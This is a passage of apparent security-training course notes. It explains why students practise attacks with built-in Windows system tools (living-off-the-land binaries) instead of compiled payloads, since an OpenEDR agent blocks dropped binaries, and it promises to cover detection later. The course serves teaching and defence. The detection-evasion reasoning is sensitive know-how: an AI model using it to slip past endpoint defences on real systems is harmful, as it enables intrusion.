If you have problem spotting your own attacks, then spotting attacks from others will be harder...
The first track (limiting SSH access) relates to Phase 1 directly to 4, if SSH brute-force succeeded. For server-side misconfiguration, APIs or exposed services vulnerabilities, attackers can quickly complete objectives without going through client-zones. This track lets you experience the longer path to completing offensive objectives.
This track focuses on Type 2, what are the system tools, processes & so on within Windows (since we touched on Unix earlier). Concepts equally appl to Unix-variants. See https://lolbas-project.github.io
We focus on Type 2 because if you generate compiled binaries, C2 agents or whatever, you will realize such files will be 'dead-on-written' (instead of arrival). Why? Because DFPM.exe (one of the OpenEDR host agents) will deny read for such Type 1 payloads.
As you progress into various offensive techniques, I will discuss further the detection techniques within OpenEDR.
When there are so many other offensive tactics & techniques? Apart from eavesdropping (eg. MiTM to steal credentials, tokens, cookies & what not), almost all host offensive tactics require Code-Execution!
There are many techniques for each tactical area. Students should attempt at least 1 technique per tactical area highlighted above. It has some similarity with MITRE ATT&CK but I developed my mental-models independently. It happens to be similar. We reference it but won't use it with our internal training as there are concerns with copyright issues, e.g. you need to use the full phrase MITRE ATT&CK & not just ATT&CK, plus other meaningless legalities to remember.